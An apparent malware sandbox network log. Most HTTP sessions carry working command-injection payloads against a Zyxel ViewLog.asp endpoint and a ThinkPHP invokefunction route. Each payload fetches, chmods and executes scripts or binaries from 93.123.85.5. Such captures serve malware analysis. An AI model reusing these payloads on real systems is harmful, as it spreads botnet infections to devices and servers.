09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              966192.168.2.235834094.122.109.2488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.479975939 CET18768OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              967192.168.2.235577431.41.164.368080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.490999937 CET18768OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:31.837228060 CET18873INHTTP/1.1 403 Forbidden
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 106
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              968192.168.2.234517095.172.118.1078080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:31.861445904 CET18873OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:32.272242069 CET18894INHTTP/1.0 404 Not Found
                                                              Content-type: text/html
                                                              Date: Mon, 13 Nov 2023 21:20:32 GMT
                                                              Connection: close
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 52 75 73 42 69 65 34 47 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 09 09 09 2e 62 75 74 74 6f 6e 20 7b 77 69 64 74 68 3a 31 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 0a 09 09 09 61 3a 6c 69 6e 6b 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 0a 09 09 09 61 3a 76 69 73 69 74 65 64 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 0a 09 09 09 61 3a 61 63 74 69 76 65 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 0a 09 09 09 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 0a 09 09 09 2e 63 20 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 0a 09 09 09 2e 6c 20 7b 77 69 64 74 68 3a 33 39 25 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 7d 0a 09 09 09 2e 72 20 7b 77 69 64 74 68 3a 35 39 25 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 7d 0a 09 09 09 2e 73 70 6f 69 6c 65 72 20 3e 20 69 6e 70 75 74 20 2b 20 6c 61 62 65 6c 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 20 22 2b 22 3b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 7d 0a 09 09 09 2e 73 70 6f 69 6c 65
                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>RusBie4G</title><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"><link rel="icon" href="/favicon.ico" type="image/x-icon"><style type="text/css">body {font-family: arial, helvetica, sans-serif;}.button {width:150px;display:none;}a:link {text-decoration:none;color:black;}a:visited {text-decoration:none;color:black;}a:active {text-decoration:none;color:black;}a:hover {text-decoration:underline;color:black;}.c {margin:auto;text-align:center;clear:both;}.l {width:39%;clear:both;float:left;text-align:right;}.r {width:59%;float:right; text-align:left;}.spoiler > input + label:after{content: "+";float: right;font-family: monospace;font-weight: bold;}.spoile


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              969192.168.2.234158495.168.184.16580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.001132011 CET18875OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:32.290468931 CET18896INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:32 GMT
                                                              Server: Apache/2.4.52 (Ubuntu)
                                                              Content-Length: 318
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 74 35 2e 76 65 6c 6f 63 69 74 61 63 6f 6e 73 75 6c 74 61 6e 63 79 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at vt5.velocitaconsultancy.uk Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              97192.168.2.235401662.1.89.1648080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.147778988 CET3060OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:24.545782089 CET3081INHTTP/1.1 400 Bad Request
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              970192.168.2.234708895.128.203.8780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.016546011 CET18876OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:32.321171045 CET18897INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:32 GMT
                                                              Server: Apache
                                                              Content-Length: 289
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 39 35 2e 31 32 38 2e 32 30 33 2e 38 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 95.128.203.87 Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              971192.168.2.234604095.217.109.16880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.025429010 CET18877OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:32.339098930 CET18899INHTTP/1.1 400 Bad Request
                                                              Server: nginx/1.14.1
                                                              Date: Mon, 13 Nov 2023 21:20:32 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 173
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              972192.168.2.234665295.86.91.14380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.070487976 CET18888OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              973192.168.2.234606631.136.176.848080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.137208939 CET18890OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:35.137145996 CET19264OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.280483961 CET20005OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:53.310761929 CET20682OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:18.907325029 CET20712OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              974192.168.2.234333094.122.26.838080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.595900059 CET18904OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              975192.168.2.234081894.122.80.2538080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.597089052 CET18905OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              97695.172.118.1078080192.168.2.2345192
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:32.664443970 CET18906INHTTP/1.0 400 Bad Request
                                                              Content-type: text/html
                                                              Date: Mon, 13 Nov 2023 21:20:32 GMT
                                                              Connection: close
